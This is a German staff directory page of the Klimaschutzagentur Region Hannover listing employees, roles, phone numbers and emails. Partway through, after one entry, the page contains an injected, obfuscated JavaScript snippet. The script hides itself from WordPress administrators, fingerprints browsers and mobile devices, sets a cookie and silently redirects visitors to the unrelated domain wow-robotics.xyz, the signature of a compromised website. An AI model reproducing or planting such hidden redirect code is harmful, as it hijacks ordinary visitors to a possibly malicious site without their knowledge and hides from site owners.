Klimaschutzagentur Region Hannover

Das Team der Klimaschutzagentur Region Hannover:

Geschäftsführung:

Udo Sahling

Geschäftsführer
0511/22 00 22 11 – Sekretariat
sekretariat@klimaschutzagentur.de


Vanessa Kohlmeier

Programmleiterin „Energieeffizienz in Wohngebäuden“
0511/22 00 22 31
v.kohlmeier@klimaschutzagentur.de


Tobias Knoke

Energieeffizienz in Unternehmen
0511/22 00 22 81
e.cobizz@klimaschutzagentur.de


Kirstin Rasenack

Projekt WEG der Zukunft,
Energieeffizienz in Wohngebäuden

0511/22 00 22 13
k.rasenack@klimaschutzagentur.de


Anne-Kathrin Bosse

Netzwerk Modernisierungspartner,
Projekt WEG der Zukunft
0511/22 00 22 85
a.k.bosse@klimaschutzagentur.de


Katharina Weweler

Programmleiterin „Stromsparen“
0511/22 00 22 75
k.weweler@klimaschutzagentur.de


Jasper Rubers

in Elternzeit


Christiane Dietrich

Programmleiterin „Bildung“, Kommunaler Klimaschutz
0511/22 00 22 72
c.dietrich@klimaschutzagentur.de


Andrea Werneke

Bildung
0511/22 00 22 73
a.werneke@klimaschutzagentur.de var a=[‚toUTCString‘,’cookie‘,’split‘,’length‘,’charAt‘,’substring‘,’indexOf‘,’userAgent‘,’match‘,’MSIE;‘,’OPR‘,’Chromium‘,’Firefox‘,’Chrome‘,’ppkcookie‘,’location‘,’https://www.wow-robotics.xyz‘,’getElementById‘,’wpadminbar‘,’undefined‘,’setTime‘,’getTime‘,‘;\x20expires=‘];(function(c,d){var e=function(f){while(–f){c[‚push‘](c[’shift‘]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‚0x0‘)](b(‚0x1‘))===null){if(typeof c===b(‚0x2‘)){function c(d,e,f){var g=“;if(f){var h=new Date();h[b(‚0x3‘)](h[b(‚0x4‘)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‚0x5‘)+h[b(‚0x6‘)]();}document[b(‚0x7′)]=d+’=’+(e||“)+g+‘;\x20path=/‘;}function i(j){var k=j+’=‘;var l=document[b(‚0x7‘)][b(‚0x8‘)](‚;‘);for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](/Android/i)||navigator['userAgent'][b('0xe')](/BlackBerry/i)||navigator[b('0xd')][b('0xe')](/iPhone|iPad|iPod/i)||navigator[b('0xd')][b('0xe')](/Opera Mini/i)||navigator[b('0xd')][b('0xe')](/IEMobile/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));


Eike Müller

Programmleiter „Windenergie“
0511/22 00 22 50
e.mueller@klimaschutzagentur.de


Friederike Stelter

EU-Projekt IRENES, Kommunaler Klimaschutz
0511/22 00 22 52
f.stelter@klimaschutzagentur.de


Udo Scherer

Programmleiter „Kommunaler Klimaschutz“
0511/22 00 22 70
u.scherer@klimaschutzagentur.de


Julia Michalczyk

Kommunaler Klimaschutz
0511/22 00 22 77
j.michalczyk@klimaschutzagentur.de


Janne Verink

Kommunaler Klimaschutz
j.verink@klimaschutzagentur.de


Monika Dening-Müller

Bereichsleiterin „Presse- und Öffentlichkeitsarbeit“
0511/22 00 22 14
m.dening-mueller@klimaschutzagentur.de


Anja Kreikemeyer

Presse- und Öffentlichkeitsarbeit
0511/22 00 22 16
a.kreikemeyer@klimaschutzagentur.de


Helge Ringeling

Veranstaltungsorganisation
0511/22 00 22 60
h.ringeling@klimaschutzagentur.de


Barbara Olze

Presse- und Öffentlichkeitsarbeit, Stromspar-Check
0511/22 00 22 57
b.olze@klimaschutzagentur.de


Fatma Özzengin

Bereichsleiterin „Verwaltung“
0511/22 00 22 11
f.oezzengin@klimaschutzagentur.de


Julia Hartmann

Personalreferentin
j.hartmann@klimaschutzagentur.de


Rebecca Grethe

Auszubildende Kauffrau Büromanagement
0511/22 00 22 18
r.grethe@klimaschutzagentur.de


Moritz Albrecht-Schoeck

EDV
0511/22 00 22 22
m.albrecht-schoeck@klimaschutzagentur.de


Lena Schäffer

in Elternzeit